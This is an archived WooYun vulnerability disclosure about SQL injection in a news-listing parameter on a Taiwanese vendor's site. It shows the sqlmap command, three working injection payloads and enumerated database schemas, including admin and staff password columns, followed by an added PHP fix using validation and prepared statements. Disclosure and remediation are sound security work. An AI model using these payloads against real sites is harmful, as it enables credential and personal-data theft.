Vulnerability summary

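ID: wooyun-2015-0155643

Title: SQL injection on the main site of 五十嵐 (Taiwan) leaks sensitive user information (Taiwan region)

Vendor: 五十嵐

Author: 卖女孩的小火柴

Submitted: 2015-11-25 14:39

Fixed: 2016-01-11 23:04

Disclosed: 2016-01-11 23:04

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (Hitcon, Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org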


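Vulnerability details

Disclosure status:

2015-11-25: Details sent to the vendor; waiting for the vendor to respond
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in the relevant field
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

See title.

Details:

Injection point: http://**.**.**.**/news_list.php?ny=2015&nm=11
Command: sqlmap.py -u "http://**.**.**.**/news_list.php?ny=2015&nm=11" -p "ny"

Proof of vulnerability: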

Parameter: ny (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ny=2015' AND 5696=5696 AND 'OGEv'='OGEv&nm=11
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ny=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))tLRO) AND 'Zzvn'='Zzvn&nm=11
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: ny=2015' UNION ALL SELECT CONCAT(0x716a767871,0x55744972576250666278,0x7170767671),NULL,NULL,NULL,NULL,NULL-- &nm=11
---
[21:23:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
[21:24:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[21:24:56] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] new50lan
Database: new50lan
[8 tables]
+-----------------+
| 50lan_admin |
| 50lan_member |
| 50lan_news_date |
| 50lan_news |
| 50lan_recruit |
| 50lan_vote |
| manager |
| staff |
+-----------------+
Database: new50lan
Table: 50lan_vote
[8 columns]
+----------------+-------------
| Column | Type
+----------------+-------------
| id | int(11)
| member_content | text
| member_date | timestamp
| member_file | varchar(250)
| member_mail | varchar(250)
| member_name | varchar(100)
| member_num | varchar(10)
| member_type | varchar(2)
+----------------+-------------
Database: new50lan
Table: 50lan_member
[7 columns]
+----------------+-------------
| Column | Type
+----------------+-------------
| member_address | varchar(200)
| member_birth | varchar(10)
| member_date | timestamp
| member_id | int(11)
| member_mail | varchar(200)
| member_name | varchar(20)
| member_tel | varchar(20)
+----------------+-------------
Database: new50lan
Table: 50lan_recruit
[7 columns]
+-------------------+----------
| Column | Type
+-------------------+----------
| recruit_area | varchar(2
| recruit_Education | varchar(2
| recruit_id | int(11)
| recruit_job | varchar(2
| recruit_type | varchar(2
| recruit_update | timestamp
| recruit_Years | varchar(2
+-------------------+----------
Database: new50lan
Table: manager
[3 columns]
+---------+------------+
| Column | Type |
+---------+------------+
| content | varchar(2) |
| id | int(11) |
| style | varchar(2) |
+---------+------------+
Database: new50lan
Table: 50lan_admin
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Admin_date | timestamp |
| Admin_id | int(11) |
| Admin_name | varchar(50) |
| Admin_pwd | varchar(100) |
| Admin_type | varchar(2) |
| Admin_user | varchar(50) |
+------------+--------------+
Database: new50lan
Table: 50lan_news
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| content | text |
| datatime | timestamp |
| id | int(11) |
| news_month | varchar(2) |
| news_year | varchar(4) |
| title | varchar(250) |
+------------+--------------+
Database: new50lan
Table: 50lan_news_date
[3 columns]
+------------+------------+
| Column | Type |
+------------+------------+
| id | int(11) |
| news_month | varchar(5) |
| news_year | varchar(5) |
+------------+------------+
Database: new50lan
Table: staff
[5 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| account | varchar(20) |
| administrator | int(1) |
| id | int(10) |
| name | text |
| passwd | varchar(20) |
+---------------+-------------+

Fix:

......

Copyright notice: when reposting, please credit the source 卖女孩的小火柴@乌云 (WooYun)
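
One way to close the injection in the `ny` parameter reported above, as an added example (not the vendor's code and not part of the original report). The table and column names are taken from the `50lan_news` listing in the proof; the function names, the in-memory SQLite stand-in database and the sample row are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: allow only a 4-digit year and a month 01-12.
function parse_year_month(array $query): ?array
{
    $ny = $query['ny'] ?? '';
    $nm = $query['nm'] ?? '';
    if (!is_string($ny) || !is_string($nm)) {
        return null; // array input such as ny[]=x is rejected
    }
    if (preg_match('/\A(?:19|20)\d{2}\z/', $ny) !== 1
        || preg_match('/\A(?:0?[1-9]|1[0-2])\z/', $nm) !== 1) {
        return null;
    }
    return [$ny, $nm];
}

// Hypothetical helper: values are bound, never concatenated into the SQL text.
function fetch_news(PDO $db, string $year, string $month): array
{
    $stmt = $db->prepare(
        'SELECT id, title FROM `50lan_news`
         WHERE news_year = :y AND news_month = :m ORDER BY id'
    );
    $stmt->execute([':y' => $year, ':m' => $month]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in database (SQLite in memory) so the example runs offline.
// On MySQL, also set PDO::ATTR_EMULATE_PREPARES to false.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE `50lan_news` (id INTEGER PRIMARY KEY, title TEXT,
           news_year TEXT, news_month TEXT)');
$db->exec("INSERT INTO `50lan_news` (title, news_year, news_month)
           VALUES ('constructed row', '2015', '11')");

$requests = [
    ['ny' => '2015', 'nm' => '11'],
    ['ny' => "2015' AND 5696=5696 AND 'OGEv'='OGEv", 'nm' => '11'], // from the report
];
foreach ($requests as $q) {
    $ym = parse_year_month($q);
    echo $ym === null ? "rejected\n" : count(fetch_news($db, ...$ym)) . " row(s)\n";
}
// Defence in depth: even unvalidated, the bound payload is compared as a plain string.
echo count(fetch_news($db, $requests[1]['ny'], '11')) . " row(s) for bound payload\n";
```

The same two layers apply to every other query the site builds from request parameters, not only `news_list.php`.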


Vulnerability response

Vendor response:

Severity: High

Rank: 16

Confirmed: 2015-11-27 23:03

Vendor reply:

Thank you for the report.

Latest status:

None

